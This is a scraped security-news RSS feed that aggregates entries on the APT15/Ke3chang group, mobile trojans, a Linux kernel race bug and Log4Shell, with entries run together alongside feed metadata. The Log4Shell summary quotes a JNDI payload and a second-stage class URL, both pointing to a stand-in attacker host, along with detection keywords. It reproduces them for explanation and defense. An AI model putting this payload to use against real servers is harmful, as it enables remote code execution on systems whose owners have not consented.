This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2024-05-20T21:54:18+00:00 www.secnews.physaphae.fr AhnLab - Korean Security Firm Tendances du groupe APT & # 8211;Juin 2023 1) Andariel 2) APT28 3) Cadet Blizzard (Dev-0586) 4) Camaro Dragon 5) Chicheau charmant (Mint Sandstorm) 6) Gamaredon (Shuckworm) 7) Ke3Chang (Apt15, Nickel) 8) Kimsuky 9) Lazarus 10) Eau boueuse 11) Mustang Panda 12) Oceanlotus 13) Patchwork (éléphant blanc) 14) REd Eyes (APT37) 15) Sharp Panda 16) Sidecopy 17) Soldat Stealth ATIP_2023_JUN_THREAT Rapport de tendance sur les groupes APT

---

APT Group Trends – June 2023  1) Andariel 2) APT28 3) Cadet Blizzard (DEV-0586) 4) Camaro Dragon 5) Charming Kitten (Mint Sandstorm) 6) Gamaredon (Shuckworm) 7) Ke3chang (APT15, Nickel) 8) Kimsuky 9) Lazarus 10) Muddy Water 11) Mustang Panda 12) OceanLotus 13) Patchwork (White Elephant) 14) Red Eyes (APT37) 15) Sharp Panda 16) SideCopy 17) Stealth Soldier ATIP_2023_Jun_Threat Trend Report on APT Groups ]]> 2023-08-16T06:46:45+00:00 https://asec.ahnlab.com/en/56195/ www.secnews.physaphae.fr/article.php?IdArticle=8370575 False Threat,Prediction APT 38,APT 35,APT 35,APT 25,APT 32,APT 32,APT 37,APT 37,APT 15,APT 15,APT 28,APT 28 2.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine 2023-02-17T17:00:00+00:00 https://www.infosecurity-magazine.com/news/eu-warns-chinese-apts/ www.secnews.physaphae.fr/article.php?IdArticle=8311285 False None APT 25,APT 31,APT 15,APT 27,APT 30 2.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Roaming Mantis Implements New DNS Changer in Its Malicious Mobile App in 2022 (published: January 19, 2023) In December 2022, a financially-motivated group dubbed Roaming Mantis (Shaoye) continued targeting mobile users with malicious landing pages. iOS users were redirected to phishing pages, while Android users were provided with malicious APK files detected as XLoader (Wroba, Moqhao). Japan, Austria, France, and Germany were the most targeted for XLoader downloads (in that order). All but one targeted country had smishing as an initial vector. In South Korea, Roaming Mantis implemented a new DNS changer function. XLoader-infected Android devices were targeting specific Wi-Fi routers used mostly in South Korea. The malware would compromise routers with default credentials and change the DNS settings to serve malicious landing pages from legitimate domains. Analyst Comment: The XLoader DNS changer function is especially dangerous in the context of free/public Wi-Fi that serve many devices. Install anti-virus software for your mobile device. Users should be cautious when receiving messages with a link or unwarranted prompts to install software. MITRE ATT&CK: [MITRE ATT&CK] T1078.001 - Valid Accounts: Default Accounts | [MITRE ATT&CK] T1584 - Compromise Infrastructure Tags: actor:Roaming Mantis, actor:Shaoye, file-type:APK, detection:Wroba, detection:Moqhao, detection:XLoader, malware-type:Trojan-Dropper, DNS changer, Wi-Fi routers, ipTIME, EFM Networks, Title router, DNS hijacking, Malicious app, Smishing, South Korea, target-country:KR, Japan, target-country:JP, Austria, target-country:AT, France, target-country:FR, Germany, target-country:DE, VK, Mobile, Android Hook: a New Ermac Fork with RAT Capabilities (published: January 19, 2023) ThreatFabric researchers analyzed a new Android banking trojan named Hook. It is a rebranded development of the Ermac malware that was based on the Android banker Cerberus. Hook added new capabilities in targeting banking and cryptocurrency-related applications. The malware also added capabilities of a remote access trojan and a spyware. Its device take-over capabilities include being able to remotely view and interact with the screen of the infected device, manipulate files on the devices file system, simulate clicks, fill text boxes, and perform gestures. Hook can start the social messaging application WhatsApp, extract all the messages present, and send new ones. Analyst Comment: Users should take their mobile device security seriously whether they use it for social messaging or actually provide access to their banking accounts and/or cryptocurrency holdings. Similar to its predecessors, Hook will likely be used by many threat actors (malware-as-as-service model). It means the need to protect from a wide range of attacks: smishing, prompts to install malicious apps, excessive]]> 2023-01-24T16:30:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-roaming-mantis-changes-dns-on-wi-fi-routers-hook-android-banking-trojan-has-device-take-over-capabilities-ke3chang-targeted-iran-with-updated-turian-backdoor www.secnews.physaphae.fr/article.php?IdArticle=8303740 False Malware,Tool,Threat,Guideline APT 25,APT 15 3.0000000000000000 CSO - CSO Daily Dashboard Palo Alto Networks report. The Chinese threat actor also known as APT15, KeChang, NICKEL, BackdoorDiplomacy, and Vixen Panda, was observed attempting to connect government domains to malware infrastructure previously associated with the APT group, according to the report.“Playful Taurus continues to evolve their tactics and their tooling. Recent upgrades to the Turian backdoor and new C2 infrastructure suggest that these actors continue to see success during their cyber espionage campaigns,” Palo Alto Networks said in a blog. To read this article in full, please click here]]> 2023-01-19T04:27:00+00:00 https://www.csoonline.com/article/3686088/chinese-hackers-targeted-iranian-government-entities-for-months-report.html#tk.rss_all www.secnews.physaphae.fr/article.php?IdArticle=8302529 False Malware,Threat APT 25,APT 15 3.0000000000000000 InfoSecurity Mag - InfoSecurity Magazine 2023-01-18T18:00:00+00:00 https://www.infosecurity-magazine.com/news/chinese-apt-group-vixen-panda/ www.secnews.physaphae.fr/article.php?IdArticle=8302416 False None APT 25,APT 15 3.0000000000000000 ProjectZero - Blog de recherche Google https://crbug.com/project-zero/2247) in the Linux kernel. (While trying to explain to someone how the fix for CVE-2021-0920 worked - I was explaining why the Unix GC is now safe, and then got confused because I couldn't actually figure out why it's safe after that fix, eventually realizing that it actually isn't safe.) It's a fairly narrow race window, so I was wondering whether it could be hit with a small number of attempts - especially on kernels that aren't built with CONFIG_PREEMPT, which would make it possible to preempt a thread with another thread, as I described at LSSEU2019. This is a writeup of how I managed to hit the race on a normal Linux desktop kernel, with a hit rate somewhere around 30% if the proof of concept has been tuned for the specific machine. I didn't do a full exploit though, I stopped at getting evidence of use-after-free (UAF) accesses (with the help of a very large file descriptor table and userfaultfd, which might not be available to normal users depending on system configuration) because that's the part I was curious about. This also demonstrates that even very small race conditions can still be exploitable if someone sinks enough time into writing an exploit, so be careful if you dismiss very small race windows as unexploitable or don't treat such issues as security bugs. The UAF reproducer is in our bugtracker.The bug In the UNIX domain socket garbage collection code (which is needed to deal with reference loops formed by UNIX domain sockets that use SCM_RIGHTS ]]> 2022-08-24T12:08:43+00:00 https://googleprojectzero.blogspot.com/2022/03/racing-against-clock-hitting-tiny.html www.secnews.physaphae.fr/article.php?IdArticle=8221935 False Tool,Guideline APT 25 2.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit (published: December 10, 2021) A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the common vulnerability scoring system (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users and exploitation proof-of-concept code exists via LunaSec explains how to exploit it in five simple steps. These include: 1: Data from the User gets sent to the server (via any protocol). 2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI). 4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code. Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability, however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap", "jndi", but this detection method is easily bypassable. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498 Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers (published: December 8, 2021) Researchers from the DevOps firm JFrog has found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1]]> 2021-12-15T16:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-apache-log4j-zero-day-exploit-google-fighting-glupteba-botnet-vixen-panda-targets-latin-america-and-europe-and-more www.secnews.physaphae.fr/article.php?IdArticle=3800465 False Malware,Tool,Vulnerability,Threat,Cloud APT 29,APT 25,APT 37,APT 15,APT 15 None Fortinet ThreatSignal - Harware Vendor 2021-12-07T15:08:56+00:00 https://www.fortiguard.com/threat-signal-report/4330 www.secnews.physaphae.fr/article.php?IdArticle=3791016 False Malware,Patching,Guideline APT 25,APT 15 4.0000000000000000 IT Security Guru - Blog Sécurité 2021-12-07T11:52:04+00:00 https://www.itsecurityguru.org/2021/12/07/dozens-of-malicious-apt15-sites-seized-by-microsoft/?utm_source=rss&utm_medium=rss&utm_campaign=dozens-of-malicious-apt15-sites-seized-by-microsoft www.secnews.physaphae.fr/article.php?IdArticle=3756579 False None APT 25,APT 15,APT 15 3.0000000000000000 Security Affairs - Blog Secu 2021-12-07T10:09:54+00:00 https://securityaffairs.co/wordpress/125365/apt/microsoft-seized-apt15-domains.html?utm_source=rss&utm_medium=rss&utm_campaign=microsoft-seized-apt15-domains www.secnews.physaphae.fr/article.php?IdArticle=3756234 False None APT 25,APT 15 None Security Affairs - Blog Secu 2020-05-28T07:51:22+00:00 https://securityaffairs.co/wordpress/103903/apt/ke3chang-group-ketrum-backdoor.html?utm_source=rss&utm_medium=rss&utm_campaign=ke3chang-group-ketrum-backdoor www.secnews.physaphae.fr/article.php?IdArticle=1737959 False Malware APT 25,APT 15 None Bleeping Computer - Magazine Américain 2020-05-26T11:22:03+00:00 https://www.bleepingcomputer.com/news/security/hacking-group-builds-new-ketrum-malware-from-recycled-backdoors/ www.secnews.physaphae.fr/article.php?IdArticle=1735030 False Malware APT 25,APT 15 None Security Affairs - Blog Secu 2019-07-24T03:07:00+00:00 https://securityaffairs.co/wordpress/88824/apt/apt15-okrum-backdoor.html www.secnews.physaphae.fr/article.php?IdArticle=1220700 True Threat APT 25,APT 15 None Malwarebytes Labs - MalwarebytesLabs A roundup of cybersecurity news from July 15–21, including the Zoom camera vulnerability, Extenbro, Sodinokibi, Magecart, and cybersecurity challenges facing the education sector. Categories: A week in security Tags: 2fa bypassadvanced persistent threatAndroid appsAPTbackdoorBitPaymer ransomwarebrowser extensionsbulletproofchromecybersecurity educationDataSpiiDDos attackDoppelPaymerEvilGnomeExtenbroFaceAppfacebookFacebook reporting toolfirefoxgenerationInstagramKe3changMagecartMedia File JackingprivacyRingCentral flawSodinokibitelegramvital infrastructurewhatsappZhumu flawzoom zero-day (Read more...) ]]> 2019-07-22T15:50:03+00:00 https://blog.malwarebytes.com/a-week-in-security/2019/07/a-week-in-security-july-15-21/ www.secnews.physaphae.fr/article.php?IdArticle=1220089 False None APT 25,APT 15 None IT Security Guru - Blog Sécurité 2019-07-19T14:35:01+00:00 https://www.itsecurityguru.org/2019/07/19/malware-that-waits-for-three-mouse-clicks-before-running/ www.secnews.physaphae.fr/article.php?IdArticle=1214430 False Malware,Threat APT 25,APT 15 2.0000000000000000 We Live Security - Editeur Logiciel Antivirus ESET Tracking the malicious activities of the elusive Ke3chang APT group, ESET researchers have discovered new versions of malware families linked to the group, and a previously unreported backdoor ]]> 2019-07-18T09:30:01+00:00 https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/ www.secnews.physaphae.fr/article.php?IdArticle=1212162 False Malware APT 25,APT 15 None Bleeping Computer - Magazine Américain 2019-07-18T07:03:00+00:00 https://www.bleepingcomputer.com/news/security/new-okrum-malware-used-by-ke3chang-group-to-target-diplomats/ www.secnews.physaphae.fr/article.php?IdArticle=1212312 False Malware,Threat APT 25,APT 15 None Security Affairs - Blog Secu 2018-06-18T12:41:02+00:00 https://securityaffairs.co/wordpress/73636/apt/apt15-miragefox-malware.html www.secnews.physaphae.fr/article.php?IdArticle=710278 False None APT 25,APT 15 None Palo Alto Network - Site Constructeur 2016-05-23T01:00:26+00:00 http://feedproxy.google.com/~r/PaloAltoNetworks/~3/lENJcXEOWiE/ www.secnews.physaphae.fr/article.php?IdArticle=1904 False None APT 25,APT 15 None